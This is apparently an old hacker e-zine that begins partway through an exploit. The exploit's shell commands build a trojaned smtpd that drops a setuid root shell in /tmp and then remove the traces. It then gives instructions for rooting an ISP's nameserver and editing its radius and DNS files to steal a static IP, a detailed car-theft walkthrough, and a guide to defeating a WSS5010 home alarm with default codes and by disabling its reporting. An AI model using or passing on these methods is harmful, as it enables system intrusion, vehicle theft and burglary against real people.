echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o foo foo.c;cc -o /tmp/smtpd smtpd.c
./foo
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm foo.c foo smtpd.c /tmp/smtpd
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time for a Change presents
Portmaster outdials and static IP's
by
Rush 2
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
It was discussed a while back how to set up a portmaster to be an outdial..
i've been playing around with them a lot lately and reading up on them and
have a few things i would like to discuss regarding them..
first, to set up an outdial on a portmaster, you need a couple of short steps.
you need to..
set (portnumber) twoway /dev/network network twoway
set (portnumber) service_device telnet (telnet port number)
from the manual:
in "twoway" mode, the port operates in User Login mode if carrier is detected
on pin 8 of the RS-232 connector (DCD). otherwise, it can be accessed as a
host device on the computer.
the host device is the name of a pseudo tty device in the /dev directory.
/dev/ttyp0-/dev/ttypf
/dev/ttyq0-/dev/ttyqf
/dev/ttyr0-/dev/ttyrf
/dev/network may be used for specifying the port as a device when a physical
port is not required or if one is not available.
you could ever set it for dial out instead of twoway if you want the port to
only be used to as a dialout.. that is, of course, something that you would
only want to do if you were setting something like this up on your *own* pm's
as it would be more easily detected than setting it twoway.
there are a number of weird things i've come across reading the portmaster
manuals and see the potential for a lot of really keen things. for example,
the option of "dialback" (as set up within radius) calls the user back after
logging in.. this presents the potential for more secure connections or (a
more realistic view) allow isp's and end users to circumvent the per minute
charges on isdn lines..
it would be set up with..
User-Service-Type = Dialback-User,
Dialback-No = "18005551212"
oh well.. my 2 cents on portmasters.. let me know if there are any questions or
things you need to know about them and I'll do my best to shed some light (or
create some confusion).
you can attach to a port when you're inside the pm administrative tool. but
this is done if you have access to the port master. we are talking about
actually allowing you to connect from an arbitrary location without giving out
access to the portmaster. but yeah, attach just throws you into a terminal
mode.
proper format is
attach <portno>
as you have stated above.
you will actually get RING's, etc on that port when you do this.. and pick up
and throw whatever bogus information you want. pretty nifty to fuck with
people dialing in.
----------------------
Static IP'S Through A livingston Portmaster Anyone?
ok, first off get root on their nameserver
look at the file /etc/named.boot there should be a line in there like
primary c.b.a.in-addr.arpa db.a.b.c
or something like that. where a.b.c.d is your address you are assigned
the 'db.a.b.c' could be anything, that's the data file for the reverse
dns tables.
somewhere else in the file /etc/named.boot should be a line like:
directory /foo/bar
this is the directory in which the data file 'db.a.b.c' is in.
so:
cd /foo/bar
vi db.a.b.c
this file will have a bunch of shit in it, SOA's, NS's and a whole lot of PTR
records. (if you really want to know more, get the o'reilly book)
there are two things you need to add, somewhere in the middle of the file,
add a line:
d IN PTR myhost.domain.name.
where 'd' is the host portion of your a.b.c.d ip address, and myhost.domain.name.
is your domain name. DONT FORGET THE TRAILING DOT.
the next thing you need to change is the serial #.
the first line of the file is either:
@ IN SOA nameserver.isp.com. postmaster.isp.com. (
(bunch of numbers)
or
c.b.a.in-addr.arpa. IN SOA nameserver.isp.com. postmaster.isp.com. (
(bunch of numbers)
the first number in a list of (i think) 5 numbers is the serial number
you have to increment it - some sites just start at '1' and go up,
while others use like 96081001 (year,month,day,revision) - if you
don't change it your changes wont propagate
ps: the SOA line bas after the SOA the name of the machine that originated
the data (nameserver.isp.com.) and the email of the person responsible
for the date with the '@' turned into a '.' - note the trailing dots.
once you've changed that, you need to change the primary dns data.
check /etc/named.boot for a line like:
primary isp.com db.isp.com
where isp.com is the domain of the isp, and db.isp.com is the name of the data
file.. so:
cd /foo/bar
vi db.isp.com
you will want to increment the serial # again, and then add in the forward
dns for your hostname.. in the middle of the file add at least :
myhost IN A a.b.c.d
there's other stuff you can add, like HINFO, MX and other stuff... but
just look at other stuff in there and add something similar.. note
there is no '.' after myhost, the domain namethis file is a data file
for is implied after myhost (myhost.isp.com) if there is no dot..
this is why the dots are important in the reverse DNS or you end up
with reverse resolution like myhost.isp.com.c.b.a.in-addr.arpa which
I'm sure you've seen.. anyway, once you made the changes and
incremented the necessary serial numbers, you need to restart the nameserver..
you do this my sending it a SIGHUP...
ps -aux | grep name
(oops, ps -ef - fucking i hate sysv) - look for 'named' or 'in.named'
kill -HUP <pid>
wait about 5-10 seconds for the nameserver to finish thinking.. then
do:
nslookup
# make sure the default server is localhost or nameserver.isp.com
ls -d c.b.a.in-addr.arpa # prints the whole reverse domain
# or, this may work if you've compiled nslookup with the option
set q=ptr
a.b.c.d
# also check the forward dns
set q=a
myhost.isp.com
# make sure they resolve.. note also you can do:
ls -d isp.com
# and look for your hostname in the dump
^D
#to exit
note you can also use:
# host a.b.c.d
and
# host myhost.isp.com
but you have to install the tools stuff from the bind distribution,
but most people are too dumb to do that..
if they run radiusd (which i am sure they do), modify the /etc/raddb/users
file. you will need to add an entry such as:
Pusername Password = "password" # or password = "UNIX"
User-Service-Type = Framed-User,
Framed-Protocol = PPP,
Framed-Address = your.static.ip,
Framed-Netmask = 255.255.255.225,
Framed-Routing = "x.x.x.x x.x.x.x†1",
Framed-MTU = 1500,
Framed-Compression = Van-Jacobsen-TCP-IP
if your account doesn't have a static ip, the Framed-Routing is set to
None, and your Framed-Address is 255.255.255.254.
depending on what radiusd you're running, you'll either have an entry in the
radius file, or it will be taken care of by the DEFAULT entry which is just
DEFAULT Password = "UNIX"
User-Service-Type = Login-User,
Login-Service = Portmaster,
Login-Host = x.x.x.x
we're probably the only isp in the world that still keeps some of our passwords
in clear text in the users file. someone correct me if i am wrong on anything
above.
assuming they use radiusd, put something like this in the users file
USER Password = "UNIX",
User-Service-Type = Framed-User,
Framed-Protocol = PPP,
Framed-Address = a.b.c.d,
Framed-Netmask = 255.255.255.0,
Framed-Routing = None,
Framed-Compression = Van-Jacobsen-TCP-IP,
Framed-MTU = 1500
of course, this will prob be detected really really really quickly, maybe
trojupgrading the radius daemon would be a better idea.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time For a Change
presents
Wisdom From the Repo Man
(How to steal cars)
by
Caliban
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
INTRODUCTION
------------
Stealing cars is what I used to do for a living, yes it was legal. This
article is basically a how to on the subject. I want it to be understood
that I do not intentionally give out this info to make car thieves out of
every reader, but what you do with this information is your perorative.
Several times, the knowledge I obtained in this line of work came in quite
handy. Example: locking my keys in my truck or having no keys at all.
Here are the basic fundamentals of getting into and successfully driving a
vehicle without keys or consent.
PLANNING
--------
First, you must locate a vehicle. This is not as easy as it sounds.
Brightly lit areas where people are known to have guns is not necessarily a
good start. In choosing a car, one must consider the following:
1. Is the car in a position to be driven out quickly? Do I have an easy
escape if something should go wrong?
2. Is the car ignition and locking system known to me?
3. If #2, do I have the proper tools?
4. Is there any way for the owner to see me clearly or get a shot off
with nothing between us?
Some repo pros probably have other top priorities, but these worked well
for me.
With Step 1 you should make sure you have several escapes with the car and
without. DON'T RISK IT! There are thousands more cars that are probably
easier. You just have to look.
Step 2 is tricky. There are as many different lock and ignitions as there are
years and models. The most common are steel rods in the doors that go directly
to the lock. Most ignitions can be popped out easily with some common tools.
This brings us to Step 3: Tools. Don't be intimidated by the fancy gadgets
on TV. I started with a coat hanger and a couple of screwdrivers and had
very few problems. Don't worry we'll get into all of that in just a minute.
Step 4 is pretty self-explanatory. Try to keep something between you and the
house or building if possible.
Clothing:
Let's say you need to get into a car. First wear dark clothing but try not
to look too suspicious. Don't be an idiot either and wear the Nike's with
the lights that flash with every step. Ok, now you have the clothing.
Tools:
If slim-jims and slide hammers are not available to you, relax. A coat
hanger (thick metal of course), a short and average sized phillips head
screwdriver and 2 flatheads, one short and one standard. A small prybar or
large flathead, electrical tape, and a pair of channel lock pliers should
do it. A punch is also helpful. Be sure to bring black electrical tape as
well.
Now you have the clothes with which you can move unseen and the tools to
remove the target. You will need a motive and destination. That part is
up to you.
It should be noted that some cars are easier than others. All Toyota cars
and trucks up to 1990 are very easy, most all of the lock systems are the
same or similar. Fords.. Well, Fords are pretty easy if you want one of those.
Stay away from newer cars if possible. I know they are cool, fast, and
command a high price from your chop shop buddies, but Save those until you
are more experienced. They take more time, have alarms, and engine kill
systems if the proper magnetic or infrared signature is not given with the
key. There are ways around these too, but that is another article altogether.
Here comes the good part, I told you i wouldn't let you down!
LIBERATION
----------
Approach the car with your coat hanger fully extended with a hook on one
end. Make sure to check the obvious, the moron could've left it open. Also
check for lowered windows and partially shut doors. No use in doing more
work than you have to, right? If these opportunities do not present
themselves slim-jim the door or break the window are your two options. I
recommend the coat hanger/slim-jim myself. Who wants to make all that noise
and sit in broken glass anyway?
When slim-jim'ing the door, stick the hooked end of the coat hanger between
the window and the weather strip. Lower it down about a foot or so. What you
are looking for is the steel rod that when lifted will unlock the door. This
will take some time if you are not familiar with the configuration. This
brings up another point. Practice on your car or your friends cars.
You can also go to an auto parts store and look up by the type of car you
want in a Chiltons or Haynes manual, and there are usually pretty good
diagrams of the ignition and door locks. if you're lucky they will have a
copy machine, and then you have your very own repo manual for that car.
Once you are inside the car, getting to the ignition can be done one of two
ways:
1. The kind and delicate approach.
Unscrew the steering column cover. Use a punch to pop the upper
ignition (the part the key goes in).
2. The Dash Bash
Get out your pry bar or big screwdriver boys!
(this is a fast speedy approach if time is critical and steering
column aesthetics are not)
Either approach will lead you to the next step;
Separating the upper ignition from the lower ignition.
A pair of channel lock pliers can be used to grasp the upper ignition and
the tip of your coat hanger can be inserted into the locking pin directly
facing you. You have to push the pin in, and then twist and pull with the
channel locks. (This works on most ignition systems). The next step is to
pull the lower ignition, this is easy, simply pull down. Sometimes there
will be a phillips screw securing the lower ignition to the steering column.
I should probably tell you what a lower ignition looks like:
Usually they are white, and they have many, many wires soldered to them.
After pulling the lower ignition, remove the connecting spindle. This will
be a metal rod that connects the upper ignition to the lower. Take the
channel lock pliers, and look underneath the column into the lower ignition
socket. You will see a piece of metal protruding from the upper ignition.
There will be a spur perpendicular to the spindle. This is made to snap off,
all you need to do is grab ahold of the spindle with your pliers and give a
good twist. You need to push the spindle up with your finger and remove it
from the upper ignition socket. Then take a flathead screwdriver, place it
in the upper ignition socket and apply upward pressure on the screwdriver.
This will unlock your steering wheel. In order for it to stay unlocked, your
electrical tape now has a use. I usually tape it directly to the steering
column (Make sure it is tight and secure). Take a flathead screwdriver and
look at the lower ignition. This is the actual ignition switch. You will see
a black circle with a hole in it. This is where the connecting spindle
normally fits. Stick your flathead screwdriver in and turn clockwise. VROOM!
Now all you have to worry about are cops, angry gun-toting owners, stupid
drunken friends, and a place to ditch it.
Although many cars are different, this technique should be fairly consistent
with most 1990 and older vehicles. Alarms and other theft deterrents i.e.
The Club, will be discussed in the next issue. As I mentioned before, be
careful and don't risk it unless absolutely necessary. Spread on what you
have garnished from this article to other would-be needy people. Until next
time.
Caliban
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time For a Change Presents
Using, Programming and Defeating the WSS5010
by
Orestes
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
"No peace without justice and that's for real."
- KMFDM
0. INTRODUCTION
This article attempts to present an overview of the electronic
security systems currently in use today. While the practical value of the
article is not greater than the abstract, it presents a picture of what is
and is not standard, what can and cannot be done, what the risk can be,
and how the wiring works, among other important things.
The case study is the Westinghouse WSS5010, a run-of-the-mill home
security system with many possible peripherals. It is assumed that the
abstract concepts will come naturally when studying the WSS5010. While
the Westinghouse system presented is much more chez Robert Allen than it
is Main Street's central office or Class of 1917 Hall, the basic ideas are
the same.
This is a large article and the reasons for reading it may not be
apparent at first. I ask for your patience. Upon completion, the reader
will have the expertise of one of Westinghouse's own technicians, and
among other things, will be able to:
o Reprogram a WSS5010 system to any degree
o Disable communication to the central station in any number of
ways
o Access a WSS5010 remotely
o Exit a WSS5010-protected building without a problem
o Spoof alarms with minimal information
There are lots of funny things you can do to the system, too.
In order to understand the text, you may need to consult the
glossary in Appendix A. Please feel free to do so.
1. THE CONTROL PANEL
The WSS5010 control panel is where the action goes on. It
supports thirty-seven access codes, which are subdivided into thirty-two
users, one system master, two masters, and two duresses. The standard
WSS5010 comes with eight zones, but can be expanded to a maximum of
thirty-two. There are twenty-seven out-of-box zone types and seven
customizable templates. The only out-of-box zone is the two-way smoke
alarm system. All system memory is encoded into EEPROMs so the system
will not lose its programming or status upon AC and battery failure.
There are two different types of keypads which are available for
the WSS5010 (see below). All keypads have a four wire (quad) connection
to KEYBUS. A maximum of eight keypads can be attached to the system.
There's also a built-in piezoelectric buzzer.
The system supports event-initiated paging with up to three phone
numbers kept in memory. There is also support for DTMF and pulse dialing,
DPDT line seizure, and LINKS 1000 cellular communication (see below).
The WSS5010 monitors many "trouble" conditions, including the
following:
o AC power failure o Trouble by zone
o Fire trouble o Telephone line trouble
o Low battery condition o Bell output trouble
o Loss of internal clock o AUX power supply fault
o Tamper by zone o Failure to communicate
o Module fault (supervisory or tamper)
In addition to these basic features:
o Keypads can active system alarm
o Keypads can be locked out
o Audio capabilities can be added (see below)
o Modules can be 1000' away by four-wire KEYBUS
o Events can be printed (see below)
o 128-entry-long event buffer (see below, printer)
o The system has upload/download capabilities
The following are the out-of-box materials:
o WSS5010 main control cabinet
o WSS5010 main control circuit board *
o WSS5508 keypad
o one Installation Manual *
o one Programming Worksheet Manual *
o one LED End User Manual
o one hardware pack (misc. electronics)
* I possess these.
2. PERIPHERALS
Up to eight keypads of homogenous or heterogenous types can be
attached to the panel.
________________________________
| .----------------------------. |
| | Memory | |
| | 1 2 3 4 5 6 7 8 Bypass | | Figure 2.1
| | Fire | | The WSS5508, eight zone LED keypad
| | Programs | | with function keys
| `----------------------------' |
|----------------o--o--o---------|
| |
| |
|________________________________|
| |
| |
| |
| (W) Westinghouse |
|________________________________|
________________________________
| .----------------------------. |
| | | |
| | Enter code | | Figure 2.2
| | To arm system | | The WSS5500, LCD keypad with
| | | | function keys.
| `----------------------------' |
|----------------o--o--o---------|
| |
| |
|________________________________|
| |
| |
| |
| (W) Westinghouse |
|________________________________|
In addition to the keypads these guys are available:
o WSS5108 Eight Zone Expander module
Increases number of zones on the system. A maximum of
three expanders can be added to a total of thirty-two
system zones.
o WSS5132-900 Wireless Receiver Module (not UL listed)
Connects up to thirty-two spread-spectrum 900 MHz wireless
devices, fully supervised and with standard AA or AAA
batteries.
o WSSPIR Wireless Motion Detector (not UL listed)
Used in conjunction with the WSS5132-900. Needs four AAA
batteries.
o WSS5580 Module (not UL listed)
Turns a touch tone phone into a keypad. Contains a
built-in interface to control up to thirty-two line
carrier type devices for lighting and temperature control.
o WSS5908 Audio Interface Module (not UL listed)
The WSS5908 "incorporates paging, intercom, baby
listen-in, background music and door answer to the WSS5010
control panel. This module also has built-in two-way
voice capability for central station."
o WSS5400 Printer Module (not UL listed)
The WSS5400 is an interface to a serial printer. Events
printed are time/date stamped.
o LINKS 1000 Cellular Communicator (not UL listed)
The LINKS starts making calls even if you snip your lines.
o Cabinets
Main panel: 11.3" x 11.7" x 3"
Power supply output module: 8.4" x 9.25" x 3"
Printer module: 9" x 7" x 2.6"
Zone expander: 6" x 4.8" x 1.5"
Wireless receiver: 6.5" x 5.625" x 1.5"
3. ACCESS CODES
[01] to [32] User codes 1 to 32
[33] Duress code
[34] Duress code
[40] System master code
[41] Master code
[42] Master code
System Master Code:
The system master code can do anything, unless System Master Code
Not Changeable {015 Option 6} has been activated, in which case attempting
to change it will cause a long error beep. It can be reprogrammed through
Installer Programming. The default Master Code is 1234.
Master Codes:
Master codes do not exist by default but serve the same function
as the SM code when programmed.
Duress Codes:
Duress codes do not exist by default but create a silent "Duress"
alarm.
User Codes:
User codes do not exist by default but can arm and disarm the
system.
4. KEYPAD COMMANDS
Arming:
The system cannot be armed unless all protected doors and windows
are secured, movement is not occurring in front of motion detectors, etc.,
a condition indicated by the 'Ready' light. There are two types of
arming: stay arming, which arms the perimeter but allows users to stay
inside, and away arming, which arms both the interior and exterior.
Disarming:
"To disarm the panel enter the premises through the designated
entry/exit door. The keypad will emit a steady beep to warn you that you
must disarm the system. During the last ten seconds of entry delay the
panel will pulse the keypad beeper on and off rapidly to warn the entry
delay is about to expire. Enter a valid access code at the keypad. If an
error is made, press the {#} key and enter the code again. When a correct
code is entered the keypad will turn off the 'Armed' light and stop the
keypad buzzer. If an alarm occurred while the panel was armed the 'Memory'
light and the zones which caused the alarm will be flashing. Press the {#}
key to return the keypad to the Ready state."
{*} Commands:
{*}+{1} Zone Bypass/Reactivate Stay/Away Zones:
This command will bypass individual zones. If Code Required for
Bypass {015 Option 5} is enabled, you will have to have a valid access
code.
To bypass a zone:
1. Enter {*}{1} [access code -- see above]. The keypad will turn
on the zone lights for zones already bypassed.
2. Enter the two-digit zone number to bypass the zone. The keypad
will turn on its light.
4. Press {#}.
To un-bypass a zone:
1. Enter {*}{1} [access code -- see above]. The keypad will turn
on the zone lights for zones already bypassed.
2. Enter the two-digit zone number to bypass the zone. The keypad
will turn off its light.
4. Press {#}.
When the system is disarmed, all manually bypassed zones will be
un-bypassed.
{*}+{2} Trouble Display:
To view trouble conditions, press {*}{2}. The keypad will flash
the 'Trouble' light and light zones where trouble conditions are present.
During a trouble condition, keypads can be shut up by pressing any key on
any keypad. See Appendix B for trouble codes.
{*}+{3} Alarm Memory:
The 'Memory' light will be on if any alarm has occurred lately
(twenty-four hours). To view alarm memory, press {*}{3}. The keypad will
flash the 'Memory' light and zone lights will light up.
{#}+{4} Door Chime On/Off:
"If enabled the keypad will beep five times rapidly when a zone is
tripped and restored. The panel will only do this for zones with the Door
Chime attribute enabled and if the door chime feature is enabled." To
toggle Door Chime, press {*}{4}. Three beeps means Door Chime is enabled,
and one long beep means disabled.
{#}+{5} Programming Access Codes:
Programming codes:
1. Press {*}{5}{Master Code}. The keypad will flash 'Program' and
turn on the zone light for any code already programmed.
2. Enter the code's two-digit number.
3. Enter a four-digit PIN. The zone light will turn on steady.
4. Continue until all codes are programmed.
5. Press {#}.
Programming attributes:
1. Enter {*}{5}{Master Code}. The keypad will flash 'Program' and
turn on the zone light for any code already programmed.
2. Press {9} to enter attribute mode. The keypad will turn on the
'Ready' light and turn off the armed light.
3. Enter the code's two-digit number. Zone lights {1} to {4}
will be on or off:
Zone Light 1 - ON - User code enabled
Zone Light 2 - ON - (reserved for future use)
Zone Light 3 - ON - enable manual bypass
4. Enter {1} to {3} to toggle the lights.
5. Continue with steps 2 and 3 until all code attributes are
programmed. Then press {#}.
{#}+{6} User Functions:
To program user functions:
1. Press {*}{6}{Master Code}. The keypad will flash 'Program.'
2. Press {1} to {5} for item to be programmed:
{1} - Time and Date - Enter military format, HH MM and MM
DD YY.
{2} - (reserved for future use)
{3} - (reserved for future use)
{4} - System Test - sounds alarms, lights up keypad, tests
batteries.
{5} - Enable DLS (downloading) - panel listens to incoming
phone calls for six hours.
{6} - (reserved for future use)
{7} - (reserved for future use)
Additional features are available with the WSS5500 LCD keypad by
using the arrow keys in the {*}{6} menu. These are:
View Event Buffer
Brightness Control
Contrast Control
Keypad Buzzer Control (different *types* of sounds)
{*}+{7} Utility Output Functions
{*}{7}{1}{Access Code} - "Door Strike" - Activate all PGM outputs
for five seconds.
{*}{7}{2} - Smoke Detector Reset
{*}+{8} Installer Programming
(see below on Installer Programming)
{*}+{9} Arming Without Entry Delay
{*}{9}{Access Code} - Arms without entry delay.
{*}+{0} Quick Exit
Quick Exit gives you two minutes to leave. Activating any
'Delay'-type zone more than once, i.e. opening and shutting a door twice,
will start entry delay. It's not clear in either the Programming
Worksheets or the Installation manual how Quick Exit Enable {015 Option 3}
defaults.
5. INSTALLER PROGRAMMING
Installer programming allows the owner to modify the various
properties of his system when he adds new modules and makes other changes.
This section covers the elementals, and PROGRAM DESCRIPTIONS explores the
various possible changes. Installer programming is pretty complicated.
The default installer code is {5010}, which is "LOLO" on a b1ffed
DTMF keypad, which is the name of GITM's cat which gives such good head.
Just goes to show you that you can't tell a ho by her cover.
To enter installer programming on an LED keypad, press
{*}{8}{Installer Code}. The 'Program' and 'Armed' lights will turn on.
'Armed' indicates it is waiting for you to type in the three-digit section
you want to access. Punch that in now. 'Armed' will turn off and 'Ready'
will turn on.
LCD keypads are much nicer. Enter {*}{8}{Installer Code}. The
keypad will say, "Enter Section---", and that's what you need to do. By
the way, the Installer Code section is {006}. Damn you double-o six!
You can press {3} to exit a section even if you haven't entered
information for all of the boxes. This makes it convenient. Also, if you
need to enter HEX, as can be necessary, press {*} and the hex code, where
1=A, 2=B, 3=C, 4=D, 5=E, and 6=F. This is similar to ALPHALOCK on TI
graphing calculators; if you need to enter decimals afterwards you must
hit {*} again. To make this a little easier to understand:
C1 = {*} {3} {*} {1}
To toggle an option, press the number which corresponds to the
option. The panel will use zone lights for the various options, and they
should go on and off when you press them. {#} exits.
To view programming on an LED pad, enter the section number. The
keypad will display information in binary where:
Zone light 1 = 1
Zone light 2 = 2
Zone light 3 = 4
Zone light 4 = 8
Add it up, Cassandra, and then press an emergency key to advance
to the next digit. When you've advanced through all the digits in a
section, 'Ready' will go off and you can enter a new section number.
Elsewise, press {#}.
On an LCD, it's much easier, and the arrow keys are used to
scroll. Consult the entire text and Appendix C for lots of different
section numbers.
6. ZONE DEFINITIONS
All zones have two-digit codes. The properties here can be
thought of like objects in a MOO in their partial object orientation.
[00] Null Zone (unprogrammed)
[01] Delay 1 Zone - If this zone is violated when the panel is
armed, it will provide an entry delay and the keypad
buzzer will sound to alert the user that the system must
be disarmed or an alarm will be generated.
[02] Delay 2 Zone - Similar to Delay 1 but with a different
entry delay. Typically used for a garage door.
[03] Instant Zone - Instant alarm when violated.
[04] Interior Zone - Causes instant alarm unless a delay zone
was violated recently.
[05] Interior Stay/Away Zone - Interior zone not triggered
during 'Stay' mode or during the exit delay of a 'Delay'
zone, or if the panel is armed without entry delay.
[06] Delay Stay/Away Zone - Similar to [05] but always provides
an entry delay. Typically used for motion detectors to
prevent false alarms because it allows the user to turn
off the panel.
[07] Delayed 24 Hour Fire Zone - Gives the user a chance to
disable the incident before the alarm goes off and the
panel communicates with the central station.
[08] Standard 24 Hour Fire Zone - [07] without the delay.
[09] 24 Hour Supervisory Zone (with LINKS) - If this zone is
violated, regardless of system state, the panel will
communicate with the central station and log the zone
fault.
[10] 24 Hour Supervisory Buzzer Zone - If this zone is
violated, regardless of system state, the keypads will
buzz until a valid user code is entered and the panel will
communicate with the central station.
[11] 24 Hour Burglary Zone - If this zone is violated,
regardless of system state, the keypads will alarm and
the panel will communicate with the central station. [12]
to [20] behave in the same manner.
[12] 24 Hour Holdup Zone
[13] 24 Hour Gas Zone
[14] 24 Hour Heat Zone
[15] (unused)
[16] 24 Hour Panic Zone
[17] 24 Hour Emergency Zone
[18] 24 Hour Sprinkler Zone
[19] 24 Hour Water Flow Zone
[20] 24 Hour Freezer Zone
[21] 24 Hour Latching Tamper - "If this zone is violated, the
installer must enter Installer Programming before the
panel to be armed."
[22] Momentary Keyswitch Arm Zone - "Momentarily violation of
this zone will alternatively arm/disarm the system."
[23] Maintained Keyswitch Arm Zone - Disarms and rearms system
as a toggle upon violation and securing.
[24] LINKS Answer Zone - Downloads through LINKS 1000 cellular
communicator.
The zone attributes are pretty straightforward. Alarm output can
be Audible vs. Silent, Pulsed vs. Steady. The zone can Activate Chime,
Bypass Enable, or Transmission Delay Enable. Furthermore, the WSS5010 has
Swinger Shutdown Enable. As Westinghouse says, "Determines if the panel
will shut down the communicator for the zone after the swinger limit is
reached." What this means is if you invite enough swingers to your party,
the panel will automatically disable the phone lines so you aren't
disturbed.
The sections for zone attributes:
Zones 1 to 32 Attributes {101} - {132}
Audible/Silent Alarm {101} - {132} Option 1
Pulsed/Steady Alarm {101} - {132} Option 2
Activate Chime {101} - {132} Option 3
Bypass Enable {101} - {132} Option 4
Swinger Shutdown Enable {101} - {132} Option 6
Transmission Delay Enable {101} - {132} Option 7
7. THE COMMUNICATOR
The Communicator is Westinghouse's general name for the method of
talking to the central station. Valid communicators are normal phone
lines, the LINKS 1000 cellular communicator, and perhaps other devices.
Here are the section numbers for Installer Programming for the
Communicator; take note of Communicator Disable.
Pulse Dialing {380 Option 3}
Switch to Pulse Dial {380 Option 4}
Post Dial Wait for Handshake {161}
Maximum Dialing Attempts {160}
Communicator Disable {380 Option 1}
The panel, as noted above, can store three different phone numbers
for communication to the central station. These phone numbers can be up
to thirty-two digits, which is just big enough to enter your credit card
onto a 1-800 phone sex line. Fortunately Westinghouse has a contingency
plan in its Alternate Dial option.
1st Phone Number {301}
2nd Phone Number {302}
3rd Phone Number {303}
3rd Phone Number Enabled {308 Option 5}
Alternate Dial {380 Option 6}
The central stations know which panel is calling through the
System Identifier Code.
System Identifier Code {310}
The communicator communicates with the central station using the
SIA or pager formats. SIA uses tones rather than pulses to transfer its
information which makes it faster. Here is a typical communication:
N Ri01 BA 01
It's a "N" new event from system "Ri01," reporting a "BA" burglary
alarm in Zone 01.
Pager format, on the other hand, uses DTMF tones to page users.
To extend possibilities here are the hex-dtmf equivalents:
0xB {*}
0xC {#}
0xD Forces panel to search for dial tone
0xE Two-second pause
0xF End of phone number marker ('\0')
Pager format can't be used on the LINK 1000 cellular communicator.
Here are some related sections:
Communicator format {360}
SIA Sends Automatic Reporting Codes {381 Option 3}
Communicator Call Direction Options {361} to {368}
Another important issue in the communicator is the configuration
of the Telephone Line Monitor (TLM). When TLM Enabled {015 Option 7} is
on, the panel will monitor the phone line, making sure it hasn't be
snipped. If TLM Trouble Only or Audible When Armed {015 Option 8} is on,
the keypads will make an alarm tone when trouble occurs. If a LINKS 1000
exists on the system, the TLM Trouble Reporting Code {350} will be sent to
the central station.
8. DOWNLOADING
Forcing the WSS5010 to download is a difficult procedure. The
panel will listen to one or two rings, miss a ring, and start a timer. If
another ring is heard before the Answering Machine Double Call Timer {405}
expires, it will answer the first ring of the second call. If Call Back
{401 Option 3} is enabled, the panel will hang up and call the Download
Computer Telephone Number {402}. If User Enable DLS Window {401 Option 2}
is enabled, {*}{6} will activate downloading for six hours. The only
other way to make the WSS5010 answer is by removing and re-applying power
to the panel. Some other things to jot down if you're planning to
download are the Download Access Code {403} (by default 5010} and the
Panel Identifier Code {404} (by default 5010). If LINKS 1000 *and* Call
Back are being used, also check the LINKS 1000 Preamble (Downloading)
{490}.
9. DEFAULTING THE SYSTEM
Defaulting the panels and modules of the WSS5010 system is easy.
To default the main panel (hardware), remove AC and battery power from the
panel and remove all wires from the Zone 1 and PGM 1 terminals. With a
piece of wire, short the Zone 1 terminal to the PGM1 terminal. Apply AC
power to the main panel. When the Zone Light 1 is lit on the keypad, the
default is complete. Remove AC power from the control and reconnect all
original wiring. Power up the control.
To default the modules and panel (software), this is the recipe:
1. Get into Installer Programming.
2. Enter Program Section.
3. Enter the Installer Code.
4. Enter the Program Section again.
Sections are as follows: Main panel (software), {999}; WSS5580,
{995}; WSS5132-900 Wireless, {996}; WSS5400 On-Site Printer, {997};
WSS5908 Audio Interface, {998}.
It's possible that Installer Lockout has been turned on, which
means a hardware default can't be performed. If so, follow the above
recipe with {991}. To re-install Installer Lockout, use {990}.
There's really no reason to default the panel through software or
any of the modules. With the Installer Code, you can do whatever you
want, but if you don't have it and it's not 5010, a hardware default could
be useful.
10. FINAL NOTES
I hope you have enjoyed this tutorial.
APPENDICES
A. GLOSSARY
Event buffer:
A memory of previous events. The WSS5010 can store 128 entries.
Function key:
Keypads have five function keys. Each key corresponds to five
different commands: Stay arm, away arm, door chime toggle, smoke detector
reset, and quick exit. Keys must be held down for two seconds to be used.
KEYBUS:
The four-wire cable between the panel and the modules.
Module:
All keypads, zone expanders, and output boards are considered
modules.
Programmable outputs:
Voltage outputs which activate on various system conditions.
Programmable outputs can be used to drive devices, too.
B. TROUBLE CONDITIONS
These are the WSS5010 trouble conditions:
[1] Service Required
[2] AC Failure
[3] Telephone Line Trouble
[4] Failure to Communicate
[5] Zone Fault (including Fire Zone)
[6] Zone Tamper
[7] Zone Low Battery
[8] Loss of System Time
C. REPORTING CODE SECTIONS
Zone Alarm Reporting Code {320 to 323}
Restoral on Bell Timeout {380 Option 2}
Zone Restoral Reporting Code {324 to 327}
Closing Reporting Code {339 to 342}
Partial Closing Reporting Code {343}
Special Closing Reporting Code {343}
Closing by Duress Code Reporting Code {343}
Recent Closing Reporting Code {328}
Opening Reporting Code {344 to 347}
Special Opening Reporting Code {348}
Opening After Alarm Reporting Code {328}
Opening by Duress Reporting Code {348}
Zone Tamper Alarm Reporting Code {330 to 333}
Zone Tamper Restoral Reporting Code {334 to 337}
General System Tamper Reporting Code {338}
General System Tamper Restoral Reporting Code {338}
Keypad Fire Alarm Reporting Code {329}
Keypad Fire Restoral Reporting Code {329}
Keypad Auxiliary Alarm Reporting Code {329}
Keypad Auxiliary Restoral Reporting Code {329}
Keypad Panic Alarm Reporting Code {329}
Keypad Panic Restoral Reporting Code {329}
Duress Reporting Code {328}
Two Wire Smoke Alarm Reporting Code {329}
Two Wire Smoke Alarm Restoral Reporting Code {329}
Battery Trouble Alarm Reporting Code {349}
Battery Trouble Restoral Reporting Code {350}
AC Failure Trouble Alarm Reporting Code {349}
AC Failure Communication Delay {370}
AC Failure Trouble Restoral Reporting Code {350}
